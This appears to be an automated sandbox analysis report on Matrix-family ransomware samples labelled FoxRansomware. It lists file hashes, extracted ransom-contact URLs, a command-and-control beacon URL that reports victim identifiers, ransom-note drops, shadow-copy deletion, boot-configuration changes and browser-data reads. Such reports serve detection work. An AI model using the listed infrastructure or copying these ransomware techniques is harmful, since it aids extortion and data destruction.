Overview
overview
10Static
static
3FoxRansomw...65.exe
windows7-x64
10FoxRansomw...65.exe
windows10-2004-x64
10FoxRansomw...a7.exe
windows7-x64
10FoxRansomw...a7.exe
windows10-2004-x64
10FoxRansomw...20.exe
windows7-x64
10FoxRansomw...20.exe
windows10-2004-x64
10FoxRansomw...0b.exe
windows7-x64
10FoxRansomw...0b.exe
windows10-2004-x64
10FoxRansomw...53.exe
windows7-x64
10FoxRansomw...53.exe
windows10-2004-x64
10FoxRansomw...b1.exe
windows7-x64
10FoxRansomw...b1.exe
windows10-2004-x64
10Resubmissions
03-04-2024 17:37
240403-v68g6sga2w 10Analysis
-
max time kernel
146s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
03-04-2024 17:37
Static task
static1
Behavioral task
behavioral1
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win7-20240319-en
Behavioral task
behavioral8
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral11
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win7-20240221-en
Behavioral task
behavioral12
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win10v2004-20240226-en
General
-
Target
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
-
Size
1.2MB
-
MD5
c82d64850d35cc6a536c11adbd261cf6
-
SHA1
9f4d070a1b4668d110b57c167c4527fa2752c1fe
-
SHA256
941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1
-
SHA512
777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002
-
SSDEEP
24576:pLeb4QFvTn5TuJR5ezGPMy4EnBBuKfDW:Qb/GMef
Malware Config
Extracted
http://myexternalip.com/raw
Extracted
C:\Program Files\Google\Chrome\Application\#KOK8_README#.rtf
https://bitmsg.me
https://bitmsg.me/users/sign_up
https://bitmsg.me/users/sign_in
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description flow ioc Process File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\lua\http\requests\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\lua\http\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\ProgramData\Microsoft\Assistance\Client\1.0\de-DE\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\logs\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0000755D\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-778096762-2241304387-192235952-1000\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Hearts\fr-FR\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\More Games\es-ES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\hrtfs\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\Desktop\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Multiplayer\Backgammon\ja-JP\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Multiplayer\Spades\it-IT\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\More Games\it-IT\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\ProgramData\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe HTTP URL 5 http://fredstat.000webhostapp.com/addrecord.php?apikey=kok8_api_key&compuser=AYFLYVMK|Admin&sid=AFln0XNhYETu2R5v&phase=419F58050E78EB07|3787|1GB Process not Found File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\resources\1033\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\db\lib\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\Documents\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Solitaire\de-DE\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3lcljf87.default-release\storage\permanent\chrome\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3lcljf87.default-release\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files (x86)\Google\Update\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\MEIPreload\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Solitaire\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1924 bcdedit.exe 2632 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 9 1784 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS 6a9E8kW864.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" 6a9E8kW864.exe -
Executes dropped EXE 64 IoCs
pid Process 2900 NW3O9cZ3.exe 1552 6a9E8kW8.exe 3336 6a9E8kW864.exe 1796 6a9E8kW8.exe 3888 6a9E8kW8.exe 2136 6a9E8kW8.exe 3692 6a9E8kW8.exe 2424 6a9E8kW8.exe 2768 6a9E8kW8.exe 1052 6a9E8kW8.exe 2552 6a9E8kW8.exe 1644 6a9E8kW8.exe 3968 6a9E8kW8.exe 2532 6a9E8kW8.exe 3148 6a9E8kW8.exe 1684 6a9E8kW8.exe 2644 6a9E8kW8.exe 3236 6a9E8kW8.exe 540 6a9E8kW8.exe 3356 6a9E8kW8.exe 284 6a9E8kW8.exe 2260 6a9E8kW8.exe 2828 6a9E8kW8.exe 4080 6a9E8kW8.exe 1976 6a9E8kW8.exe 1652 6a9E8kW8.exe 3468 6a9E8kW8.exe 2280 6a9E8kW8.exe 2408 6a9E8kW8.exe 3516 6a9E8kW8.exe 3704 6a9E8kW8.exe 3156 6a9E8kW8.exe 1968 6a9E8kW8.exe 3980 6a9E8kW8.exe 1592 6a9E8kW8.exe 2428 6a9E8kW8.exe 3960 6a9E8kW8.exe 2972 6a9E8kW8.exe 3344 6a9E8kW8.exe 3392 6a9E8kW8.exe 3440 6a9E8kW8.exe 760 6a9E8kW8.exe 1724 6a9E8kW8.exe 1052 6a9E8kW8.exe 2528 6a9E8kW8.exe 3740 6a9E8kW8.exe 3612 6a9E8kW8.exe 1588 6a9E8kW8.exe 3000 6a9E8kW8.exe 2584 6a9E8kW8.exe 3808 6a9E8kW8.exe 3956 6a9E8kW8.exe 3772 6a9E8kW8.exe 3036 6a9E8kW8.exe 2172 6a9E8kW8.exe 2328 6a9E8kW8.exe 3896 6a9E8kW8.exe 3356 6a9E8kW8.exe 284 6a9E8kW8.exe 2944 6a9E8kW8.exe 1784 6a9E8kW8.exe 1920 6a9E8kW8.exe 2092 6a9E8kW8.exe 968 6a9E8kW8.exe -
Loads dropped DLL 64 IoCs
pid Process 1732 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 1732 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 3868 cmd.exe 1552 6a9E8kW8.exe 2660 cmd.exe 2688 cmd.exe 2176 cmd.exe 924 cmd.exe 3188 cmd.exe 676 cmd.exe 2108 cmd.exe 3436 cmd.exe 2128 cmd.exe 1452 cmd.exe 2468 cmd.exe 2036 cmd.exe 2040 cmd.exe 3212 cmd.exe 2272 cmd.exe 3888 cmd.exe 2052 cmd.exe 2576 cmd.exe 2736 cmd.exe 2140 cmd.exe 2612 cmd.exe 2788 cmd.exe 1952 cmd.exe 576 cmd.exe 1828 cmd.exe 3184 cmd.exe 2364 cmd.exe 2932 cmd.exe 2608 cmd.exe 4092 cmd.exe 3084 cmd.exe 4056 cmd.exe 2356 cmd.exe 2240 cmd.exe 2464 cmd.exe 2604 cmd.exe 2176 cmd.exe 2396 cmd.exe 2460 cmd.exe 2628 cmd.exe 2108 cmd.exe 2368 cmd.exe 3204 cmd.exe 2552 cmd.exe 3096 cmd.exe 2424 cmd.exe 2492 cmd.exe 3284 cmd.exe 3552 cmd.exe 3876 cmd.exe 3720 cmd.exe 4016 cmd.exe 2116 cmd.exe 2184 cmd.exe 3752 cmd.exe 3624 cmd.exe 3564 cmd.exe 3796 cmd.exe 3304 cmd.exe 2012 cmd.exe -
Modifies file permissions 1 TTPs 64 IoCs
pid Process 3936 takeown.exe 2836 takeown.exe 3224 takeown.exe 2492 takeown.exe 3484 takeown.exe 1632 takeown.exe 2712 takeown.exe 1496 takeown.exe 888 takeown.exe 2916 takeown.exe 2700 takeown.exe 3604 takeown.exe 2976 takeown.exe 3568 Process not Found 3136 takeown.exe 1056 takeown.exe 2996 takeown.exe 3748 takeown.exe 1368 takeown.exe 3980 takeown.exe 3000 Process not Found 3012 Process not Found 1532 takeown.exe 1944 takeown.exe 3612 takeown.exe 1872 takeown.exe 3020 takeown.exe 2008 Process not Found 4048 takeown.exe 3796 takeown.exe 4080 takeown.exe 2696 takeown.exe 528 takeown.exe 1748 takeown.exe 3016 takeown.exe 892 takeown.exe 1612 takeown.exe 1796 takeown.exe 216 takeown.exe 2452 takeown.exe 2888 takeown.exe 2196 takeown.exe 3164 Process not Found 2564 takeown.exe 3060 Process not Found 1524 takeown.exe 3068 takeown.exe 3964 takeown.exe 3912 takeown.exe 1708 takeown.exe 2464 takeown.exe 2144 takeown.exe 3180 takeown.exe 1688 takeown.exe 1176 takeown.exe 3364 takeown.exe 1528 takeown.exe 1836 takeown.exe 852 takeown.exe 3572 takeown.exe 3436 takeown.exe 1048 takeown.exe 2092 takeown.exe 236 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral11/files/0x0006000000015c54-2119.dat upx behavioral11/memory/1552-2370-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1796-5220-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3888-5238-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2136-5911-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3692-6035-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2768-6885-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2424-6662-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1052-7134-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1552-7135-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2552-7139-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1644-7187-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2128-7184-0x0000000000480000-0x00000000004F7000-memory.dmp upx behavioral11/memory/3968-7197-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2532-7218-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3148-7221-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3148-7222-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1684-7491-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1684-7490-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2644-7644-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3236-7797-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/540-7800-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3356-7805-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/284-7810-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2260-7817-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2828-7822-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/4080-7826-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/4080-7825-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1976-7829-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1652-7837-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3468-7840-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2280-7849-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2408-7851-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3516-7856-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2932-7859-0x0000000000280000-0x00000000002F7000-memory.dmp upx behavioral11/memory/3704-7861-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3156-7863-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1968-7867-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1968-7866-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3980-7872-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1592-7874-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2428-7879-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2428-7878-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3960-7881-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2972-7887-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3344-7889-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3392-7896-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3440-7899-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/760-7901-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1724-7902-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1052-7910-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2528-7912-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3740-7920-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3612-7923-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1588-7928-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3000-7932-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3000-7931-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2584-7934-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3808-7935-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3956-7943-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3772-7946-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3036-7954-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2172-7956-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2328-7961-0x0000000000400000-0x0000000000477000-memory.dmp upx -
Drops desktop.ini file(s) 40 IoCs
description ioc Process File opened for modification C:\Users\Public\Music\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\8YA80BVK\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Documents\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Links\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Mahjong\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Searches\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Hearts\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Recorded TV\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 